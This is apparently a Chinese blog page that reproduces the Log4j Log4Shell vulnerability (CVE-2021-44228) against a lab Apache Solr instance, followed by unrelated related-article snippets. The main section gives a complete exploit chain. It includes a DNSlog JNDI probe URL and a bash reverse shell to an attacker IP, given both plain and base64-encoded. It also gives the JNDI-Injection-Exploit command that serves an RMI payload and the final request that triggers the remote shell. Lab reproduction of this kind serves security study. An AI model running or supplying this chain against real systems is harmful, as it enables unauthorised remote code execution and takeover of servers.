当前位置: 首页 > news >正文

log4j CVE-2021-44228 RCE漏洞复现

一、漏洞特征
Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。
影响版本:Apache Log4j 2.x <= 2.14.1
访问http://192.168.232.131:8983/即可查看到Apache Solr的后台页面
在这里插入图片描述

访问
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:ldap://ugvqt3.dnslog.cn}
dnslog可以收到相关日志
在这里插入图片描述

二、漏洞复现
1.准备payload
bash -i >& /dev/tcp/192.168.245.2/6969 0>&1
192.168.245.2是攻击机ip
base加密:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==
在这里插入图片描述

2.开启监听
在这里插入图片描述

3.获取jndi payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.245.2
这里echo后面就是你加密之后的值,最后面的IP还是攻击机的IP,回车启动
在这里插入图片描述

启动后提取第一个payload:rmi://192.168.245.2:1099/sfvz6q
4.反弹shell
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:rmi://192.168.245.2:1099/sfvz6q}
在这里插入图片描述

相关文章:

log4j CVE-2021-44228 RCE漏洞复现

一、漏洞特征 Apache Log4j 是 Apache 的一个开源项目&#xff0c;Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架&#xff0c;并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等&#xff0c;通过定义每一条日志信息的…...

leetcode 刷题 - 有效三角形个数 - 长度最小的子数组 - 无重复字符的最长子串

l611. 有效三角形的个数 - 力扣&#xff08;LeetCode&#xff09; 给定一个包含非负整数的数组 nums &#xff0c;返回其中可以组成三角形三条边的三元组个数。 示例 1:输入: nums [2,2,3,4] 输出: 3 解释:有效的组合是: 2,3,4 (使用第一个 2) 2,3,4 (使用第二个 2) 2,2,3示…...

如何更好的使用Copilot

Copilot从诞生到现在过去了挺长时间了&#xff0c;大家对Copilot的评价算是褒贬不一吧。有些人觉得Copilot高效且神奇&#xff0c;可以对自己的工作大大提效&#xff1b;有些觉得也就那样&#xff0c;为什么要花那么多钱做这个事情&#xff0c;钱它不香吗&#xff1f; 从最开始…...

C++ Qt 学习(五):Qt Web 编程

1. Chrome 技术介绍 大多数 web 技术都是基于 chrome&#xff0c;例如 CEF、QCefView 以及 QWebEngineView&#xff0c;这些都是在 native 界面里用来显示 html 网页&#xff0c;并且可以与 web 交互 例如常见的登录窗口、优酷的视频区域、WPS 的稻壳商城等&#xff0c;这些都…...

基于arm-gcc 工具链开发mcu程序时,怎么便捷查看内存映像

目录 一、背景 arm-none-eabi-size 二、脚本实现 2.1. 源码2.2. 效果呈现 三、实现说明 3.1 基本思路3.2 涉及到的shell 相关知识 3.2.1 sed 实现只打印第二行3.2.2 cut 截取某一行数据的第n个字段3.2.3 使用bc 计算器&#xff0c;实现浮点运算 一、背景 arm-gcc 工具链…...

亚马逊云科技Zero ETL集成全面可用,可运行近乎实时的分析和机器学习

亚马逊云科技数据库、数据分析和机器学习全球副总裁Swami Sivasubramanian曾指出&#xff1a;“数据是应用、流程和商业决策的核心。”如今&#xff0c;客户常用的数据传输模式是建立从Amazon Aurora到Amazon Redshift的数据管道。这些解决方案能够帮助客户获得新的见解&#x…...

Java 设计模式——访问者模式

目录 1.概述2.结构3.案例实现3.1.抽象访问者类3.2.抽象元素类3.3.具体元素类3.4.具体访问者类3.5.对象结构类3.6.测试 4.优缺点5.使用场景6.扩展6.1.分派6.2.动态分配6.3.静态分配6.4.双分派 1.概述 访问者模式 (Visitor Pattern) 是一种行为型设计模式&#xff0c;它用于将数…...

Mysql联合查询

Mysql联合查询 T1表结构&#xff08;用户名,密码&#xff09; useridusernamepassword1jackpwd12owenpwd2 T2表结构&#xff08;用户名,密码&#xff09; useridjifendengji12033506 第一&#xff1a;内联&#xff08;inner join&#xff09; 如果想把用户信息、积分、等…...

响应式婴幼儿早教启蒙网站模板源码

模板信息&#xff1a; 模板编号&#xff1a;6830 模板编码&#xff1a;UTF8 模板颜色&#xff1a;红色 模板分类&#xff1a;学校、教育、培训、科研 适合行业&#xff1a;培训机构类企业 模板介绍&#xff1a; 本模板自带eyoucms内核&#xff0c;无需再下载eyou系统&#xf…...

ChatGPT付费创作系统V2.4.9独立版 +WEB端+ H5端 + 小程序端系统测试安装教程

播资源提供的GPT付费体验系统最新版系统是一款基于ThinkPHP框架开发的AI问答小程序&#xff0c;是基于国外很火的ChatGPT进行开发的Ai智能问答小程序。当前全民热议ChatGPT&#xff0c;流量超级大&#xff0c;引流不要太简单&#xff01;一键下单即可拥有自己的GPT&#xff01;…...

react 修改less文件后保存,内存溢出,项目崩溃问题解决

一、完整报错 一个很老的react项目&#xff0c;因为没有package-lock.json版本锁&#xff0c;导致拉下来的时候&#xff0c;安装的依赖版本冲突&#xff0c;好不容易启动起来&#xff0c;修改less文件后只要一保存&#xff0c;项目就会崩溃&#xff0c;需要重启&#xff0c;报…...

Lib文件和netlist的关系,DDC文件和netlist的区别

今天来说一说两个基础的概念&#xff1a; 1&#xff1a;综合用的Lib文件和netlist网表的关系 在数字IC设计中&#xff0c;Lib和网表都是非常重要的文件&#xff0c;但它们的作用和用途有很大的区别。 Lib文件&#xff0c;也称为库文件&#xff0c;主要包含单元级的信息&…...

万宾科技智能井盖,实现对井盖的监测

随着人工智能和物联网技术的不断变化&#xff0c;各种适用于市政府提高管理能力和公共服务水平的高科技产品不断更新。在道路基础设施建设过程中&#xff0c;智能井盖传感器的出现时刻保护着城市地下生命线&#xff0c;而且可以对地下水道井盖进行实时的监测并完成数据上传等工…...

使用Python从零实现多分类SVM

前言 本文将首先简要概述支持向量机及其训练和推理方程&#xff0c;然后将其转换为代码以开发支持向量机模型。之后然后将其扩展成多分类的场景&#xff0c;并通过使用Sci-kit Learn测试我们的模型来结束。 SVM概述 支持向量机的目标是拟合获得最大边缘的超平面(两个类中最近…...

WPF ToggleButton 主题切换动画按钮

WPF ToggleButton 主题切换动画按钮 仿造最近看到的html中的一个效果&#xff0c;大致思路是文章这样&#xff0c;感觉还可以再雕琢一下。 代码如下 XAML: <UserControl x:Class"WPFSwitch.AnimationSwitch"xmlns"http://schemas.microsoft.com/winfx/200…...

centerOS下docker 搭建IotDB集群

一、准备3台机器&#xff0c;IP地址依次为IP1&#xff0c;IP2&#xff0c;IP3&#xff0c;找一个目录下建立文件夹如下&#xff1a; ./data/confignode ./logs/confignode ./data/datanode ./logs/datanode二、在当前目录下建立docker-compose.yml文件&#xff0c;3台都要 1、…...

Vue3-Composition-API-学习笔记

01.Setup函数的体验 App.vue <template><div><h2>当前计数&#xff1a;{{ counter }}</h2><button click"increment">1</button><button click"decrement">-1</button></div> </template>&…...

NSS [HUBUCTF 2022 新生赛]checkin

NSS [HUBUCTF 2022 新生赛]checkin 判断条件是if ($data_unserialize[username]$username&&$data_unserialize[password]$password)&#xff0c;满足则给我们flag。正常思路来说&#xff0c;我们要使序列化传入的username和password等于代码中的两个同名变量&#xff0…...

免费小程序HTTPS证书

随着互联网的快速发展&#xff0c;小程序已经成为人们日常生活中不可或缺的一部分。然而&#xff0c;在小程序的开发和使用过程中&#xff0c;安全问题一直是开发者们关注的重点。其中&#xff0c;HTTPS 证书是保障小程序安全的重要工具之一。在这方面&#xff0c;免费的小程序…...

Linux arm64异常简介和系统调用过程

文章目录 一、异常简介1.1 Exception levels1.2 异常类型 二、系统调用简介2.1 SVC指令2.2 VBAR2.3 系统调用保存现场2.4 系统调用返回 三、Linux 内核分析参考资料 一、异常简介 在ARM64体系架构中&#xff0c;异常是处理器在执行指令时可能遇到的不寻常情况或事件。这些异常…...

AUTOSAR DEM实战:手把手教你配置KL30电压监控的Debounce参数(含代码示例)

AUTOSAR DEM实战&#xff1a;KL30电压监控Debounce参数配置全解析 在汽车电子系统开发中&#xff0c;电压监控是确保车辆电气系统稳定运行的关键功能。KL30作为常电电源线&#xff0c;其电压异常可能引发一系列连锁反应。本文将深入探讨如何通过AUTOSAR DEM模块的Debounce机制&…...

别只发GET请求了!ESP32的HTTPClient库POST数据到服务器,保姆级配置流程(含模拟测试)

ESP32实战&#xff1a;HTTPClient库POST数据全流程指南与模拟测试方案 在物联网开发中&#xff0c;数据采集只是第一步&#xff0c;如何将传感器数据可靠地上传到服务器才是真正体现项目价值的环节。很多开发者习惯使用GET请求获取数据&#xff0c;却忽视了POST请求在数据上传中…...

别再只会用HttpClient了!用C# Socket手搓一个TCP聊天室(WinForms实战)

用C# Socket构建WinForms聊天室&#xff1a;从零实现TCP通信实战 第一次接触网络编程时&#xff0c;看着那些晦涩的协议文档和黑底白字的命令行界面&#xff0c;总觉得离实际应用很远。直到把Socket和WinForms结合起来&#xff0c;才发现原来网络通信可以如此直观——消息在文本…...

别再只用ollama run了!手把手教你调用Ollama的Embeddings API玩转bge-m3等向量模型

解锁Ollama Embeddings API&#xff1a;从bge-m3错误到向量化实战指南 当你第一次在终端输入ollama run bge-m3:567m却看到"does not support generate"的错误提示时&#xff0c;可能感到困惑——明明已经成功拉取模型&#xff0c;为什么无法使用&#xff1f;这个看似…...

BilibiliDown:三步完成B站视频批量下载的完整方案

BilibiliDown&#xff1a;三步完成B站视频批量下载的完整方案 【免费下载链接】BilibiliDown (GUI-多平台支持) B站 哔哩哔哩 视频下载器。支持稍后再看、收藏夹、UP主视频批量下载|Bilibili Video Downloader &#x1f633; 项目地址: https://gitcode.com/gh_mirrors/bi/Bi…...

不只是关弹窗:从中标麒麟试用提示聊聊国产Linux系统的授权与日常维护

中标麒麟系统试用机制解析与深度维护指南 当你在深夜赶项目时&#xff0c;屏幕右下角突然弹出的试用到期提示框是否让你抓狂&#xff1f;这背后其实隐藏着国产操作系统独特的商业模式和技术架构。作为国内最早实现商用的Linux发行版之一&#xff0c;中标麒麟的试用提示机制恰似…...

S32K144时钟配置避坑指南:手把手教你用S32DS的clock_manager组件搞定外设时钟(附代码)

S32K144时钟配置实战&#xff1a;从原理到避坑的完整指南 第一次接触S32K144的时钟系统时&#xff0c;我被它的灵活性震惊了——但随之而来的是配置时的迷茫。记得有一次调试FlexCAN模块&#xff0c;程序莫名其妙地进入复位中断循环&#xff0c;花了整整两天才发现是时钟门控没…...

手把手教你用ROS camera_calibration完成工业相机内参标定

1. 工业相机标定入门指南 刚接触ROS和工业相机的开发者经常会遇到一个实际问题&#xff1a;为什么拍摄的物体图像会出现变形&#xff1f;比如用Flir相机拍摄的棋盘格线条弯曲&#xff0c;或者测量物体尺寸时总有几个毫米的误差。这些问题往往源于相机镜头本身的畸变和成像系统误…...

3种创新方法:如何用CREST彻底解决分子构象采样难题

3种创新方法&#xff1a;如何用CREST彻底解决分子构象采样难题 【免费下载链接】crest CREST - A program for the automated exploration of low-energy molecular chemical space. 项目地址: https://gitcode.com/gh_mirrors/crest/crest 你是否曾为分子构象探索的计算…...

ESP32 OTA升级实战:从官方native_ota_example到自定义固件服务器的完整配置指南

ESP32 OTA升级实战&#xff1a;从官方示例到生产级部署的进阶指南 当你的ESP32设备部署在远程现场&#xff0c;每次更新固件都要派人去现场烧录&#xff1f;这种低效方式早已过时。OTA&#xff08;Over-The-Air&#xff09;技术让设备像智能手机一样远程更新&#xff0c;而ESP3…...